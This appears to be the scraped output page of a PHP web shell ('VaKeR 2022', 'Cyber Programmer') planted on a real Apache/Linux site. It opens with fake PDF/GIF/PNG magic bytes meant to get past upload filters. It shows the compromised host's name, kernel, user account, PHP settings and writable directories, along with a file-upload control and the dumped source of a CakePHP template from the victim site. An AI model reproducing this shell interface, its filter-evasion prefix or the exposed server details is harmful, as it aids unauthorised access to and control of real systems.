%PDF- %GIF98; %PNG; .
Cyber Programmer
Logo of a company Server : Apache
System : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : addictionfreeind ( 1003)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/addictionfreeind/public_html/src/Template/Users/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/addictionfreeind/public_html/src/Template/Users/treatments.ctp
<?php	$centre = $centre->toArray();?>
<div class="breadcrumb">
<ul>
<li><?php echo $this->Html->link('Home', array('controller'=>'pages','action'=>'home'),array('escape' => false));?></li>
<li>Update Treatments</li>
</ul>
</div>

<div class="row">
<div class="col-lg-12 col-md-12 col-sm-12 col-xs-12">
<?php echo $this->Form->create('register', ['url' => ['controller' => 'users', 'action' => 'treatments'],'class'=>'user-form',]);?>
<div class="single-login">
<h1>Update Treatments</h1>
<?php if(empty($errors) AND (!empty($this->request->getData('submit')))){ ?>
<div class="success">Treatments updated Successfully</div>
<?php } ?>

<?php
foreach ($treatment as $roles) {
?>
<div class="col-md-4 col-sm-12"><input <?php if(strpos($centre[0]['treatment'], $roles['name']) !== false) { echo 'checked'; }?> id="<?php echo $roles['name'];?>" type="checkbox" name="treatment[]" value="<?php echo $roles['name'];?>"><label for="<?php echo $roles['name'];?>"><span></span><?php echo $roles['name'];?></label></div>
<?php
}
?>
<div class="col-lg-12 col-md-12 col-sm-12 col-xs-12"><?php echo $this->Form->button("submit",array('class'=>'submit','div' => false, 'name' => 'submit','value'=>'Sign Up'));?></div>
<?php echo $this->Form->end();?>
<div class="cleafix"></div>
</div>
</div>
</div>



VaKeR 2022